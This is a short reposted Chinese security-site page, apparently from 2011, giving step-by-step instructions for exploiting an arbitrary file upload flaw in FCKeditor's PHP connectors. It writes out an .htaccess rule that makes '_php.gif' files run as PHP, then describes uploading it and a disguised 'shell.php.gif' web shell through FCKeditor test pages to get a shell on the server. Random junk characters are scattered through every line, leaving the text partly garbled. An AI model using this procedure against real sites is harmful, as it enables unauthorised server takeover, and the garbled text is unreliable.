FCKeditor所有php版本Upload上传漏洞5 k$ D/ k7 }6 c, H8 v7 F6 o3 G
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
0 b( G* _* K8 [0 q减小字体 增大字体
1 |1 a7 ~8 P, c0 w3 k3 B+ q) z[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability: p; z1 k* N+ F X# o
[+] Date: 20119 G0 {% t3 g+ ?& c( O/ n
[+] Author : sinesafe.cn! Y) c' M/ v" k
[+] Website : WwW.sinesafe.cn
! h. a, |- [: @' V4 l' I5 T; U———————————————————5 ] s* ^4 s4 k) J+ M1 G$ x
1.create a htaccess file:% w' E9 T6 b! _. g8 a: t% X
code:$ N X3 t% L, U4 z, P
<FilesMatch “_php.gif”>
+ Q3 c. ~4 V. R4 A4 w0 cSetHandler application/x-httpd-php
4 G6 b( R [% R: ]2 \</FilesMatch>8 ^ E- E7 [: D* a# B, v3 `/ e+ k
6 S2 F4 A0 A8 i$ Q2.Now upload this htaccess with FCKeditor., H5 H4 T# e6 t. @: P2 y. V
2 K# [2 v( Y" h! m
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html/ o% F3 } Y9 W: t
5 ~/ m+ Q1 l: X6 \3 v F
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
0 S, u1 S5 Z& A0 G6 _( C
6 b4 y/ c: I8 \" O, B& F5 @———————————————————————————————-/ q- x0 D; {- e# A1 c
3.Now upload shell.php.gif with FCKeditor.
2 c V3 H, F' e; S6 [$ h4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
7 h" ~8 G4 Q( T) \7 B7 w5.http://www.sinesafe.cn/anything/shell_php.gif9 k; j+ E3 L: }% _5 @
6.Now shell is available from server. | 6 F+ B* G9 t' O- A. _
0 |5 r( r9 z# l
7 R( E' [. z2 r1 f9 @9 ?/ _) `8 {
|